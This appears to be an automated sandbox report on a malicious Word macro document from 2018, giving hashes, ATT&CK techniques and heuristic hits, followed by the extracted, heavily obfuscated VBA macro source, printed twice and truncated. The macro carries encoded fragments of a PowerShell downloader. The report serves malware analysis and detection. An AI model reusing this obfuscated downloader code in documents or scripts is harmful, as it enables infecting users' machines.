Office (OLE) malware analysis — malicious · b18f42e2e1543973

MALICIOUS

Office (OLE)

89.5 KB Created: 2018-02-16 06:49:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: f369c135565d0db69583ea360b0ff530 SHA-1: 8bc7760f66b4071a031c58359b37a5fb653ca2a6 SHA-256: b18f42e2e1543973d300428a971dd595b89b77774975cb1a1c646888a80634b6

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. The AutoOpen macro is also present, suggesting an automatic execution upon opening. The script attempts to construct a URL, likely for downloading a secondary payload, which is a common technique for malware delivery. The reconstructed URL is 'http://wwwhNf+hNf.abhNf+hNfcthNMlTdjVqndkXiLZYcJXiJET'.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://wwwhNf+hNf.abhNf+hNfcthNMlTdjVqndkXiLZYcJXiJET� In document text (OLE body)
- http://wwwhNf+hNf.abhNf+hNfcthNMlTdjVqndkXiLZYcJXiJETIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23726 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	23726 bytes
SHA-256: `e03714f4d81303daa3222232fc4d1741f4a01d50fcb59e9a63e52c16d000779d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "mAjSIzYJ" Function LAUNaDrsGllwSL() On Error Resume Next NFpKibcNRGu = 2440533 / CLng(QVrbRNNKA) - 2432151 * Cos(2665667) + aLoiQokRlETA + 9731133 jZXNGc = 5616795 / CLng(lDhtRzA) - 3187965 * Cos(3151728) + irqCwFCm + 8336284 HDiiTRqz = 1793812 / CLng(jOzEwvjLBqc) - 7736159 * Cos(433898) + GSTwkZuYSi + 9438936 tZuzk = (zbjrYwOsj) + HJjkJKD("HoFuVCabX+abXE(([cHar]6abX+abX6+vqP+vqP[c'+'HavqP+vqPr]88+[cHar]'+'51),[StRIng][cvqP+vqPHarabX+abX]34)ZJKBCL", 6, 98) DHvuRai = 5114993 / CLng(njpGjlLwOGEfv) - 2419280 * Cos(7022724) + VUXZRhddjJ + 7982592 ZrMkz = 1833676 / CLng(dtGowLhYAktqt) - 4235227 * Cos(6603595) + ZVsizjj + 3257689 VpoBDaVu = 226827 / CLng(FFMaawBDk) - 2597171 * Cos(9616386) + wACDUkdiXLvPH + 7670664 ihZPZXlliO = (QEOZFDn) + HJjkJKD("amXjMGNfsd.nexthNf+hNf(1000hvqP+vqPNf'+'+hNf0,hNf+hNf hNf+hNf2hNf+hNfabX'+'+abX82vqP+vqP13hNf+h'+'Nf3)h'+'Nf+'+'hvqP+vqPNf;RSxADCXhNf+abX+abXhNf = hNf+VDnjImrnSEjthqchXXRLYEIMDhcDEJ", 7, 145) rjGAT = 8780579 / CLng(zTmzWH) - 8224081 * Cos(632999) + DVuaru + 5098493 DqwlkP = 6297983 / CLng(haawYOFDCfLCV) - 5049646 * Cos(2382619) + OHWzSiuR + 1498040 jiiQmfwImkM = 5965865 / CLng(wABUY) - 1247618 * Cos(4655596) + SjwuXtSF + 2151540 CnaYBNIdoXW = (lUQiYrbtOznSA) + HJjkJKD("DBbBOVzDwlLWOlz+hvqP+abX+abXvqPNf&hNf+hN'+'f(vqP+vqPOf'+'JnOfJ+OfJhNf+hNfeOhNf+hNffJtOIXAkTOMOGiDHRjLvR", 16, 69) icsicma = 2460683 / CLng(EzcjZBzHNtYjVX) - 9238858 * Cos(3594400) + ZHAMkPFzFKkn + 7893149 QMDaaOfk = 4729973 / CLng(aEicXzj) - 7972462 * Cos(9380532) + vJbiR + 4692848 UppQvtbWBqa = 196184 / CLng(HJIMnTjWjTrM) - 3902348 * Cos(4779183) + LGQsTvpp + 3451713 JwsiqCrzR = (tLJCALmvzHtjQ) + HJjkJKD("pCczmoGvVizOkIEpBRCjZhNf).REplaCE(hNf5m'+'oZYSwGnMcAZlEGlRC", 22, 21) LbYtr = 9629538 / CLng(jWpQYAfhtRTq) - 1674190 * Cos(5944732) + dsOfFcVqFH + 8411807 wndMcz = 9934446 / CLng(aubZTTYSQNv) - 7601450 * Cos(1157695) + EQvNF + 7344024 bfGziHzjhR = 6148082 / CLng(HzksINf) - 6957596 * Cos(1721165) + BwHzqtWpGMN + 5938499 XONsYAoT = (ljwhPEORKtANQ) + HJjkJKD("vHCjmQRIPYwNCNfabX+abX+hNf+hNf+hNfOfJwhNfabX+'+'abX+hNfOfJ+OfJ-ohNabX+abXf+hNfbjevqP+vqPcthNf+hNfOfJabX+abXhNf+hNf) hNf+hNfShNf+h'+'NfyshNfCLCR", 14, 126) lnjiP = 6156959 / CLng(OmHuF) - 4886576 * Cos(320014) + PjTBcjsthwEaP + 9035801 htcwhjFYH = 7608680 / CLng(wMOEvivZhZEFrj) - 2246263 * Cos(279115) + CWhiJJ + 9268395 TjhZvRhi = 9268716 / CLng(dOhFpTwKztL) - 9396117 * Cos(9137387) + ltTDbnBBkDSN + 4768861 KqfwdiSMjQz = (BKmcpbLLm) + HJjkJKD("ZalQiKvOlBbX+ab'+'X(OfJ.exOhNfiwEKA", 11, 20) UdzANfwY = 6699462 / CLng(qLGkwopG) - 3923056 * Cos(1695762) + cdinbuswJqs + 7740943 TzwSV = 6582497 / CLng(EBrSrjUSSMGG) - 7721568 * Cos(1891290) + wvzzjYCNo + 1668995 IOVwa = 8034562 / CLng(kZbzXYA) - 8396784 * Cos(7612266) + odbMJLRjVGiWLv + 9083649 TathQaQSBnM = (jsbkkGj) + HJjkJKD("okGtNQERhTiIjMwaiQhpjNEiAWibhNf+hNfOUhNvqP+vqPf+hNfOfhNf+hNfJhabX+abXNf+hNf + '+'RSh'+'Nf+hNfxNhNf+KYR", 28, 72) ZLZKJw = 1437832 / CLng(jiNNjCiWopzu) - 5901460 * Cos(5359454) + cPUCzn + 3585327 DounQhTb = 3222256 / CLng(KoaQhvKsvWSo) - 4408478 * Cos(6087052) + NALzcm + 1238103 MjfFZHKdJjF = 5442568 / CLng(PrzWtKAQOcCsb) - 3464144 * Cos(7859525) + iHwIJUFkKowbT + 7734817 tEhQvMhBwOD = (ioSlAGUXUPrv) + HJjkJKD("TIfZkRSFWvUfJOucJjiDTTjFHTLwicFRhNfSB + hNf+hNabX+abXf'+'a'+'czQhlqc", 33, 29) izbItiwLM = 8940005 / CLng(PLFNYzZdwftQ) - 9795469 * Cos(9267356) + JMmHuKHsCNFMq + 3832798 AddKRHJGatr = 9253244 / CLng(zHDjctXzEARim) - 8597944 * Cos(3573024) + KHVvhbAcH + 3736618 NiiBjba = 444975 / CLng(TljJC) - 7659519 * Cos(8881053) + vPNPop + 606642 hYuMUH = (liWHziITj) + HJjkJKD("QjbCviAGDAuWn+hNfnsadahNf+hrCD", 14, 14) MIkzVGLkI = 1787847 / CLng(vtGHsYGiiN) - 8524074 * Cos(1152157) + kALCdWCUqEYR + 2270224 wNNwDsTnFFo = 6908159 / CLng(mBHLlFFpst) - 3521458 * Cos(990 ... (truncated)

SHA-256: e03714f4d81303daa3222232fc4d1741f4a01d50fcb59e9a63e52c16d000779d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mAjSIzYJ"
Function LAUNaDrsGllwSL()
On Error Resume Next
NFpKibcNRGu = 2440533 / CLng(QVrbRNNKA) - 2432151 * Cos(2665667) + aLoiQokRlETA + 9731133
jZXNGc = 5616795 / CLng(lDhtRzA) - 3187965 * Cos(3151728) + irqCwFCm + 8336284
HDiiTRqz = 1793812 / CLng(jOzEwvjLBqc) - 7736159 * Cos(433898) + GSTwkZuYSi + 9438936
tZuzk = (zbjrYwOsj) + HJjkJKD("HoFuVCabX+abXE(([cHar]6abX+abX6+vqP+vqP[c'+'HavqP+vqPr]88+[cHar]'+'51),[StRIng][cvqP+vqPHarabX+abX]34)ZJKBCL", 6, 98)
DHvuRai = 5114993 / CLng(njpGjlLwOGEfv) - 2419280 * Cos(7022724) + VUXZRhddjJ + 7982592
ZrMkz = 1833676 / CLng(dtGowLhYAktqt) - 4235227 * Cos(6603595) + ZVsizjj + 3257689
VpoBDaVu = 226827 / CLng(FFMaawBDk) - 2597171 * Cos(9616386) + wACDUkdiXLvPH + 7670664
ihZPZXlliO = (QEOZFDn) + HJjkJKD("amXjMGNfsd.nexthNf+hNf(1000hvqP+vqPNf'+'+hNf0,hNf+hNf hNf+hNf2hNf+hNfabX'+'+abX82vqP+vqP13hNf+h'+'Nf3)h'+'Nf+'+'hvqP+vqPNf;RSxADCXhNf+abX+abXhNf = hNf+VDnjImrnSEjthqchXXRLYEIMDhcDEJ", 7, 145)
rjGAT = 8780579 / CLng(zTmzWH) - 8224081 * Cos(632999) + DVuaru + 5098493
DqwlkP = 6297983 / CLng(haawYOFDCfLCV) - 5049646 * Cos(2382619) + OHWzSiuR + 1498040
jiiQmfwImkM = 5965865 / CLng(wABUY) - 1247618 * Cos(4655596) + SjwuXtSF + 2151540
CnaYBNIdoXW = (lUQiYrbtOznSA) + HJjkJKD("DBbBOVzDwlLWOlz+hvqP+abX+abXvqPNf&hNf+hN'+'f(vqP+vqPOf'+'JnOfJ+OfJhNf+hNfeOhNf+hNffJtOIXAkTOMOGiDHRjLvR", 16, 69)
icsicma = 2460683 / CLng(EzcjZBzHNtYjVX) - 9238858 * Cos(3594400) + ZHAMkPFzFKkn + 7893149
QMDaaOfk = 4729973 / CLng(aEicXzj) - 7972462 * Cos(9380532) + vJbiR + 4692848
UppQvtbWBqa = 196184 / CLng(HJIMnTjWjTrM) - 3902348 * Cos(4779183) + LGQsTvpp + 3451713
JwsiqCrzR = (tLJCALmvzHtjQ) + HJjkJKD("pCczmoGvVizOkIEpBRCjZhNf).REplaCE(hNf5m'+'oZYSwGnMcAZlEGlRC", 22, 21)
LbYtr = 9629538 / CLng(jWpQYAfhtRTq) - 1674190 * Cos(5944732) + dsOfFcVqFH + 8411807
wndMcz = 9934446 / CLng(aubZTTYSQNv) - 7601450 * Cos(1157695) + EQvNF + 7344024
bfGziHzjhR = 6148082 / CLng(HzksINf) - 6957596 * Cos(1721165) + BwHzqtWpGMN + 5938499
XONsYAoT = (ljwhPEORKtANQ) + HJjkJKD("vHCjmQRIPYwNCNfabX+abX+hNf+hNf+hNfOfJwhNfabX+'+'abX+hNfOfJ+OfJ-ohNabX+abXf+hNfbjevqP+vqPcthNf+hNfOfJabX+abXhNf+hNf) hNf+hNfShNf+h'+'NfyshNfCLCR", 14, 126)
lnjiP = 6156959 / CLng(OmHuF) - 4886576 * Cos(320014) + PjTBcjsthwEaP + 9035801
htcwhjFYH = 7608680 / CLng(wMOEvivZhZEFrj) - 2246263 * Cos(279115) + CWhiJJ + 9268395
TjhZvRhi = 9268716 / CLng(dOhFpTwKztL) - 9396117 * Cos(9137387) + ltTDbnBBkDSN + 4768861
KqfwdiSMjQz = (BKmcpbLLm) + HJjkJKD("ZalQiKvOlBbX+ab'+'X(OfJ.exOhNfiwEKA", 11, 20)
UdzANfwY = 6699462 / CLng(qLGkwopG) - 3923056 * Cos(1695762) + cdinbuswJqs + 7740943
TzwSV = 6582497 / CLng(EBrSrjUSSMGG) - 7721568 * Cos(1891290) + wvzzjYCNo + 1668995
IOVwa = 8034562 / CLng(kZbzXYA) - 8396784 * Cos(7612266) + odbMJLRjVGiWLv + 9083649
TathQaQSBnM = (jsbkkGj) + HJjkJKD("okGtNQERhTiIjMwaiQhpjNEiAWibhNf+hNfOUhNvqP+vqPf+hNfOfhNf+hNfJhabX+abXNf+hNf + '+'RSh'+'Nf+hNfxNhNf+KYR", 28, 72)
ZLZKJw = 1437832 / CLng(jiNNjCiWopzu) - 5901460 * Cos(5359454) + cPUCzn + 3585327
DounQhTb = 3222256 / CLng(KoaQhvKsvWSo) - 4408478 * Cos(6087052) + NALzcm + 1238103
MjfFZHKdJjF = 5442568 / CLng(PrzWtKAQOcCsb) - 3464144 * Cos(7859525) + iHwIJUFkKowbT + 7734817
tEhQvMhBwOD = (ioSlAGUXUPrv) + HJjkJKD("TIfZkRSFWvUfJOucJjiDTTjFHTLwicFRhNfSB + hNf+hNabX+abXf'+'a'+'czQhlqc", 33, 29)
izbItiwLM = 8940005 / CLng(PLFNYzZdwftQ) - 9795469 * Cos(9267356) + JMmHuKHsCNFMq + 3832798
AddKRHJGatr = 9253244 / CLng(zHDjctXzEARim) - 8597944 * Cos(3573024) + KHVvhbAcH + 3736618
NiiBjba = 444975 / CLng(TljJC) - 7659519 * Cos(8881053) + vPNPop + 606642
hYuMUH = (liWHziITj) + HJjkJKD("QjbCviAGDAuWn+hNfnsadahNf+hrCD", 14, 14)
MIkzVGLkI = 1787847 / CLng(vtGHsYGiiN) - 8524074 * Cos(1152157) + kALCdWCUqEYR + 2270224
wNNwDsTnFFo = 6908159 / CLng(mBHLlFFpst) - 3521458 * Cos(990
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.